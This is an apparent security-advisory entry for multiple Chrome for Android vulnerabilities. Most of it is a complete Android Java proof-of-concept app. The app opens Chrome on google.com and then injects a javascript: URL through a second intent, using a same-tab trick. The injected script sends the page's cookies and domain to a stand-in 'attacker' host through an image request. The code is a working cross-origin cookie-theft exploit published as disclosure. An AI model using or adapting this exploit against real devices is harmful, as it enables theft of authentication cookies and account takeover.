source: https://www.securityfocus.com/bid/55523/info
Google Chrome for Android is prone to multiple vulnerabilities.
Attackers may exploit these issues to execute arbitrary code in the context of the browser, obtain potentially sensitive information, bypass the same-origin policy, and steal cookie-based authentication credentials; other attacks are also possible.
Versions prior to Chrome for Android 18.0.1025308 are vulnerable.
package jp.mbsd.terada.attackchrome1;
import android.app.Activity;
import android.os.Bundle;
import android.content.Intent;
import android.net.Uri;
public class Main extends Activity {
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.main);
doit();
}
// get intent to invoke the chrome app
public Intent getIntentForChrome(String url) {
Intent intent = new Intent("android.intent.action.VIEW");
intent.setClassName("com.android.chrome", "com.google.android.apps.chrome.Main");
intent.setData(Uri.parse(url));
return intent;
}
public void doit() {
try {
// At first, force the chrome app to open a target Web page
Intent intent1 = getIntentForChrome("http://www.google.com/1");
startActivity(intent1);
// wait a few seconds
Thread.sleep(3000);
// JS code to inject into the target (www.google.com)
String jsURL = "javascript:var e=encodeURIComponent,img=document.createElement('img');"
+ "img.src='http://attacker/?c='+e(document.cookie)+'&d='+e(document.domain);"
+ "document.body.appendChild(img);";
Intent intent2 = getIntentForChrome(jsURL);
// Trick to prevent Chrome from opening the JS URL in a different tab
intent2.putExtra("com.android.browser.application_id", "com.android.chrome");
intent2.addFlags(Intent.FLAG_ACTIVITY_SINGLE_TOP);
// Inject JS into the target Web page
startActivity(intent2);
}
catch (Exception e) {}
}
}
